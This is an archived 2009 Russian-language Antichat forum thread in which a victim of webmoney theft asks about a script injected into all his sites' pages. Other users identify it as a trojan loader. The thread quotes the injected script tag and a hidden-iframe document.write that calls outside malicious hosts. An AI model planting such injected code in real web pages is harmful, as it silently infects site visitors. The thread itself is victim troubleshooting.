Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
02.09.2009, 01:49
|
|
Новичок
Регистрация: 06.06.2009
Сообщений: 7
Провел на форуме:
69905
Репутация:
2
|
|
Что это за скрипт?
На днях у меня "похозяйничал" троян... Увели 3 бакса с webmoney. Вроде бы всё почистил. Но вчера заметил, что на всех моих сайтах в конце всех страниц index или main появился такой код
Код:
<script src=http://flo4.cn/1.txt></script>
По адресу flo4.cn/1.txt соответственно находится такой скрипт:
Код:
document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5' style='display: none;'></iframe>");
Я понимаю, что попало это туда скорее всего через Тотал Коммандер. Пароли к фтп все храню там (знаю, что небезопасно, но ничего ценного в тех сайтах нет).
Интересно, что происходит при срабатывании этого скрипта в конечном итоге? |
|
|
02.09.2009, 02:07
|
|
Новичок
Регистрация: 29.06.2007
Сообщений: 18
Провел на форуме:
642141
Репутация:
17
|
|
Сообщение от LeRick
На днях у меня "похозяйничал" троян... Увели 3 бакса с webmoney. Вроде бы всё почистил. Но вчера заметил, что на всех моих сайтах в конце всех страниц index или main появился такой код
Код:
<script src=http://flo4.cn/1.txt></script>
По адресу flo4.cn/1.txt соответственно находится такой скрипт:
Код:
document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5' style='display: none;'></iframe>");
Я понимаю, что попало это туда скорее всего через Тотал Коммандер. Пароли к фтп все храню там (знаю, что небезопасно, но ничего ценного в тех сайтах нет).
Интересно, что происходит при срабатывании этого скрипта в конечном итоге? во первых- почисть host -папочку !! во вторых я думаю что сам панимаеш что ето значит document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5 !!! посмотри host файлы - там наверника что то левое !!((
|
|
|
|
02.09.2009, 08:41
|
|
Новичок
Регистрация: 29.06.2007
Сообщений: 18
Провел на форуме:
642141
Репутация:
17
|
|
LeRick - а вопше то юзай поиском по iframe ! http://forum.antichat.ru/search.php?searchid=5058055&pp=25&page=1
|
|
|
|
02.09.2009, 10:09
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606
Репутация:
105
|
|
в этом айфрейме подгрузчик трояна
|
|
|
|
02.09.2009, 17:35
|
|
Постоянный
Регистрация: 28.03.2009
Сообщений: 334
Провел на форуме:
381178
Репутация:
165
|
|
У меня вопрос: а как смогли с WebMoney баки потянуть?
Возможно, троян - всего лишь маскировка?
|
|
|
|
02.09.2009, 20:18
|
|
Новичок
Регистрация: 06.06.2009
Сообщений: 7
Провел на форуме:
69905
Репутация:
2
|
|
Сообщение от X-3
У меня вопрос: а как смогли с WebMoney баки потянуть?
Возможно, троян - всего лишь маскировка?
Не знаю, я ж не специалист 
Кипер на компе был онлайн. WMZ перевели через обменник на яндекс-деньги. Возможно, меня не было за компом в это время. Не помню. Увидел позже сообщение об авторизации и пустой вмз кошелек. WMR не тронули, хотя там больше было, чем на вмз. У меня в настройках была включена возможность совершения операций через кипер-мини. Скорее всего этим и воспользовались...
После этого я отключил использование кипер-мини, сменил пароль, сделал новый файл ключей и установил активацию через телефон, а не через мэйл. А через пару дней получаю смску с кодом для активации кипера на другом компе. Видимо, опять пытались забраться в кошелек
|
|
|
|
02.09.2009, 20:54
|
|
Новичок
Регистрация: 29.06.2007
Сообщений: 18
Провел на форуме:
642141
Репутация:
17
|
|
Сообщение от LeRick
Не знаю, я ж не специалист
Кипер на компе был онлайн. WMZ перевели через обменник на яндекс-деньги. Возможно, меня не было за компом в это время. Не помню. Увидел позже сообщение об авторизации и пустой вмз кошелек. WMR не тронули, хотя там больше было, чем на вмз. У меня в настройках была включена возможность совершения операций через кипер-мини. Скорее всего этим и воспользовались...
После этого я отключил использование кипер-мини, сменил пароль, сделал новый файл ключей и установил активацию через телефон, а не через мэйл. А через пару дней получаю смску с кодом для активации кипера на другом компе. Видимо, опять пытались забраться в кошелек кажетсо шо у тебя бекдор !встанови фаэрвол !! )))
|
|
|
|
02.09.2009, 22:22
|
|
Новичок
Регистрация: 06.06.2009
Сообщений: 7
Провел на форуме:
69905
Репутация:
2
|
|
Фаервол стоял. Комодо. Вчера снес его и поставил старый добрый Аутпост
Зашел на страничку с таким ифреймом и Аутпост сразу доложил об подозрительных действиях. В папку Windows/Temp загружается файл экзешный и пытается изменить explorer.exe и еще парочку прог винды.
Больше ничего подозрительного не замечал. Сегодня с утра проверил полностью комп антивирусом и воспользовался помощью на сайте virusinfo. Сказали, что в логах, которые я им отослал, ничего подозрительного нет. |
|
|
|
03.09.2009, 12:39
|
|
Постоянный
Регистрация: 28.03.2009
Сообщений: 334
Провел на форуме:
381178
Репутация:
165
|
|
У меня даже уведомление об ответе в этой теме антивирус на почту не пропускает.
"Держите штаны крепче, господа" (с)
|
|
|
|
03.09.2009, 12:53
|
|
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
Провел на форуме:
3886281
Репутация:
929
|
|
Читайте отчет. Оттуда и связку можно дернуть и малвару их пореверсить
http://wepawet.iseclab.org/view.php?hash=d91da88baf6ef98f1c3552742ff66a76&t=1 251968690&type=js
Последний раз редактировалось spider-intruder; 03.09.2009 в 13:12..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
